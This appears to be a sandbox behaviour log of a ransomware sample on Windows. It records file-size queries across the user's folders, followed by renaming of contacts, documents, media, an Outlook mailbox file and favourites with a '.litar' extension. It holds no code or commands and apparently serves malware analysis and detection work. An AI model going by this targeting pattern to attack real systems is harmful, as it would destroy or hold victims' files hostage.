Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\6iJuvel1.odt	type = size, size_out = 73404	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\BR7Cji.doc	type = size, size_out = 79440	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\DQcA9QRfBGkKr w6.docx	type = size, size_out = 46987	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\TWsD3\WAQy.xlsx	type = size, size_out = 35748	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico	type = size, size_out = 29926	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\-RJ_rXnG1_.m4a	type = size, size_out = 75683	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\tvalSG6kWCd\oJv-O\vDiwpl_QLurQQz6.mp3	type = size, size_out = 102002	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\sHdKY9oX2.m4a	type = size, size_out = 86019	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\smH64uN0q8.wav	type = size, size_out = 70715	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\v _P9.mp3	type = size, size_out = 6882	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\3JFk\ylebE_y3_yj.m4a	type = size, size_out = 71201	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\NiLbAzC1YwUFTvZqU.wav	type = size, size_out = 99847	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\rqr FeHB_E8CueZs9.mp3	type = size, size_out = 89466	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\FxgxMEyG6Z\VpT_TcidUDkQuxNiXW9.mp3	type = size, size_out = 12006	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\3mMy51V.wav	type = size, size_out = 45682	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\L4TT06vVg0ef.m4a	type = size, size_out = 68711	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\WBMmCD2Hu9jcGCg.wav	type = size, size_out = 35849	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\fQS43pyYf93X_Ex4mvdQ.jpg	type = size, size_out = 11339	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\Mw3Rg1vX.bmp	type = size, size_out = 43863	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\KpZlD4zquX\oWuD6cFhx.bmp	type = size, size_out = 84918	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\EfuTYTPiCx LOe.png	type = size, size_out = 50704	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\F1NPm.bmp	type = size, size_out = 95760	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\LyCXLD1At.png	type = size, size_out = 14247	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\R5ZCMh\MFCCzusoQ99IUVZOnO.jpg	type = size, size_out = 89656	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\RzVVuYwX5ISIAY3GJCd.jpg	type = size, size_out = 10485	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\USjQB.bmp	type = size, size_out = 60816	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\EVQWdEk.mp4	type = size, size_out = 71477	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\FktDzr_Il x_4yzD.flv	type = size, size_out = 73295	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\mmUH6saj5D04se1Ny.mkv	type = size, size_out = 42670	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\v3vmN1a.flv	type = size, size_out = 80138	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\4fiD3H F26C.csv	type = size, size_out = 86697	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0cFh2o\FF1E_qOk_q3b2hS6Wq.odt	type = size, size_out = 69290	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\02kt3FBU.ots	type = size, size_out = 21169	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\1rim73kXzbZdPVb.ppt	type = size, size_out = 38235	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\GcIb4JtMTQ.ppt	type = size, size_out = 54937	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\hxwsGGSX.odt	type = size, size_out = 38084	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\QUfuVrMTFwGhP.odt	type = size, size_out = 36041	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\WPd8.docx	type = size, size_out = 49775	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\RrMc-y7gilA\0hH2Yg pWVEr\xdcv4NFG2H1C8.pdf	type = size, size_out = 31159	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\jx1kJWZdi iCE.mp3	type = size, size_out = 11573	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\7fX2K\Si93eS7jq6X4SJC7vm61.mp3	type = size, size_out = 56623	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\ISL0.mp3	type = size, size_out = 60745	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Music\zTvNij62y31ygD\YJf_dR\_IS6dQkXRiXDfJ5-\OIIPvpIKePb.wav	type = size, size_out = 15194	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\4KoQgGe.jpg	type = size, size_out = 86466	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\nEqZA\WF0f1QmDHo82b2E\X_INggXuIaYsOTYsJW7\MGGz-2Q618NkS r.gif	type = size, size_out = 33318	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\8gCaS.mkv	type = size, size_out = 30440	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\4t8dP5RHOtB8TtLqW.mp4	type = size, size_out = 56198	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\b3vNAE2PVhFDju_7yS.mp4	type = size, size_out = 17723	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\d_Y88L0xD5.mkv	type = size, size_out = 49194	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\nOS9oi.swf	type = size, size_out = 34849	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\sd3L87.avi	type = size, size_out = 74823	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UdyiuRr9KYVW-Px_.mkv	type = size, size_out = 74636	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\M1Ow pK RUoG\UyfgKSYNRi6Oyp.swf	type = size, size_out = 62666	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Adobe\Acrobat\10.0\rdrmessage.zip	type = size, size_out = 42495	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\index.dat	type = size, size_out = 32768	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.cab	type = size, size_out = 581730	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\AU\au.msi	type = size, size_out = 185344	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\Deployment\deployment.properties	type = size, size_out = 719	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\Data1.cab	type = size, size_out = 25340970	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Sun\Java\jre1.7.0_45\jre1.7.0_45.msi	type = size, size_out = 906752	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\9tDINHGgROIz00XY.avi	type = size, size_out = 21324	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\gpNfbjz4.avi	type = size, size_out = 45896	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\qTnRlL.swf	type = size, size_out = 90523	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\tMaPYPi5JgUXP1XW.flv	type = size, size_out = 88333	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\U3-na4Ecc7B.flv	type = size, size_out = 36899	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\w8QtRE0Av57MWN-aHv.flv	type = size, size_out = 56854	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\b-b9YkzIMqBbLX\FlfRA9\16cC5\VAY0f6Tek5y2drs\y3s8jy4WEuwL8.mp4	type = size, size_out = 70857	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\36USA68T\imagesrv.adition[1].xml	type = size, size_out = 13	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\3O75JDME\www.google[1].xml	type = size, size_out = 13	1	Fn
Get Info	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\LocalLow\Microsoft\Internet Explorer\DOMStore\VGMTOI09\www.msn[1].xml	type = size, size_out = 836	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\0N28733.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\2_-YQaqX40ls7kZnQI.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\4hZE9nFAdJv.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6bvJUbgBGTbsIJMKW8.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\6igNpwR0pgLT9a.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\75tKv_wPWu nle.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\ay_t-P.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\C6eN8spyaXs9O5N.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iMKYkmcr3Dm3Fk6ffK.ots	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\kP8ULRqZpLx.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\OXbBkJHSc.ods	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\p41R3hPr.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\pAeUc4J9behwUSLh5ZK.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\PolmUMHRORMWgP.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\QATxQ8 VuKhKsG6j5boU.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\qTEbn_aHVk98J.pdf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\q_qr72fTT.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\rzNuUzflSMr4Y.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\t1oDIACQ6VZc-ArQIwpX.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Yg5sCFMNs8oiIw.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0Q3LulVoi6BYXkATC.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\0r-zyx2wH0-I.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\30Wm1uP_k08jvj97lQ5Z.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7okz4Pc-gSuOVu.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GfPtWvk5Lmj.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\GRA80ibP5ZcjgL2YpVJ.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\kpj8t.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\KsTqGqqzg.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\OrLlCAU81JJA3-CN.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Q4Mi.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\RAIpVw9N67HN.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rUyI.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\TFi_rpFOJSO_vICGfl.docx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tGcOKsKW8vY3r.pptx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tgGDARb0KAuLH86cV.pdf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\UxVjqI79MHDnp-w7vHYP.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Ys koK.xlsx	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\f1KLA.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\NDR1.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\RCBYlf_e4F0CAnTDs_Cv.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Music\U3NMPiDKOwkRxmiQp.m4a	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\dQ_0l6.gif	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\2U_8PhFaccxBmEGBGe3v.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\5Qd_U17.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\7xg3.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\gJEx.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\igFrRTPuZ1KOcff.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\M2Hq1q.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\thMFQm.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\vLbfj.mp4	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Videos\VvaG-iQ-9rXlD9Y.mkv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\LL-t.wav	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\PbT_4bgt7AZeNnG57IPC.avi	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\eyzvk3aytLrTvd\rb8St5qJhaFz.bmp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\3yYw8jcr.png	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\45N3LRg1kFlD_Qyjf8.jpg	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\HID JrRHaaXMym.swf	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\iN9wXlo7M3\XWPPBA.flv	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\FRhJVbO27hszhEC4EU.odp	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\pCC1nCcN4mL.xls	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\38Tocm\SNg4GRtr2YJUAzJ_6.ppt	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Home.url	1	Fn
Move	C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url.litar	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url	1	Fn
